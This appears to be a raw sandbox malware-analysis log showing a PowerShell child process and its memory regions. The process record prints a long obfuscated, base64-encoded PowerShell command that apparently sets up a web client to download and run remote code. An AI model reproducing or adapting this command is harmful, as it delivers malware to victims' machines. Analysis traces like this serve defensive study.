() returned 0x8a0001 [0089.994] CRetailMalloc_Free () returned 0x1740001 [0089.994] CRetailMalloc_Free () returned 0x37e0001 [0089.994] CRetailMalloc_Free () returned 0x1 [0089.994] CRetailMalloc_Free () returned 0x20001 [0089.994] CRetailMalloc_Free () returned 0x1be0101 [0089.994] CRetailMalloc_Free () returned 0xef30201 [0090.001] CRetailMalloc_Free () returned 0x430001 [0090.001] CRetailMalloc_Free () returned 0x6a0001 [0090.227] VirtualFree (lpAddress=0x3bb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.228] CRetailMalloc_Free () returned 0x72a0201 [0090.229] VirtualFree (lpAddress=0x3bc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.229] CRetailMalloc_Free () returned 0x77e0201 [0090.230] CRetailMalloc_Free () returned 0x1 [0090.230] CRetailMalloc_Free () returned 0x1 [0090.230] CRetailMalloc_Free () returned 0x1 [0090.230] CRetailMalloc_Free () returned 0x1 Thread: id = 12 os_tid = 0xa48 Thread: id = 13 os_tid = 0xa64 Thread: id = 21 os_tid = 0xa98 Thread: id = 62 os_tid = 0xb44 Process: id = "2" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x7eef76c0" os_pid = "0xa68" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAUA" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 432 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 433 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 434 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 435 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 436 start_va = 0x22160000 end_va = 0x221d1fff entry_point = 0x22160000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 437 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 438 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 439 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 440 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 441 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 442 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 443 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 444 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 445 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 446 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 447 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 448 start_va = 0x6bbc0000 end_va = 0x6bc09fff entry_point = 0x6bbc2e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 449 start_va = 0x741c0000 end_va = 0x741d3fff entry_point = 0x741c0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 450 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 451 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 452 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 453 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 454 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 455 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 456 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 457 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 458 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 459 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 460 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 461 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 462 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 463 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 464 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 465 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 468 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 469 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 470 start_va = 0x1e0000 end_va = 0x1e2fff entry_point = 0x1e0000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 471 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 472 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 473 start_va = 0x350000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 474 start_va = 0x460000 end_va = 0x105ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 475 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 476 start_va = 0x1210000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 477 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 478 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 479 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 480 start_va = 0x1090000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 481 start_va = 0x10d0000 end_va = 0x11aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 482 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 483 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 484 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 485 start_va = 0x74af0000 end_va = 0x74b06fff entry_point = 0x74af0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 486 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 487 start_va = 0x1060000 end_va = 0x1061fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001060000" filename = "" Region: id = 488 start_va = 0x1070000 end_va = 0x1070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 489 start_va = 0x1080000 end_va = 0x1081fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 490 start_va = 0x1220000 end_va = 0x14eefff entry_point = 0x1220000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 491 start_va = 0x1510000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 492 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 493 start_va = 0x74600000 end_va = 0x746f4fff entry_point = 0x74610d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 494 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 495 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 496 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 497 start_va = 0x1200000 end_va = 0x1200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 498 start_va = 0x1550000 end_va = 0x1575fff entry_point = 0x1550000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db") Region: id = 499 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 500 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 501 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 502 start_va = 0x1580000 end_va = 0x167ffff entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 503 start_va = 0x1680000 end_va = 0x1a72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001680000" filename = "" Region: id = 504 start_va = 0x71510000 end_va = 0x7155bfff entry_point = 0x71510000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 505 start_va = 0x6f120000 end_va = 0x6f14dfff entry_point = 0x6f120000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 506 start_va = 0x1ae0000 end_va = 0x1b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 507 start_va = 0x1b40000 end_va = 0x1b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 508 start_va = 0x6f110000 end_va = 0x6f118fff entry_point = 0x6f11153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 509 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 510 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 511 start_va = 0x11f0000 end_va = 0x11f3fff entry_point = 0x11f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 512 start_va = 0x14f0000 end_va = 0x14f3fff entry_point = 0x14f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 513 start_va = 0x1a80000 end_va = 0x1aaffff entry_point = 0x1a80000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 514 start_va = 0x1b80000 end_va = 0x1be5fff entry_point = 0x1b80000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 515 start_va = 0x70100000 end_va = 0x7016ffff entry_point = 0x70101f65 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 516 start_va = 0x75290000 end_va = 0x752a8fff entry_point = 0x75291319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 517 start_va = 0x1db0000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 518 start_va = 0x70170000 end_va = 0x7017afff entry_point = 0x70171200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 519 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 520 start_va = 0x74190000 end_va = 0x74199fff entry_point = 0x74194d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 521 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e72dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 522 start_va = 0x74c20000 end_va = 0x74c5afff entry_point = 0x74c2128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 523 start_va = 0x63d80000 end_va = 0x63df9fff entry_point = 0x63d81f48 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 524 start_va = 0x1500000 end_va = 0x1500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001500000" filename = "" Region: id = 525 start_va = 0x1c20000 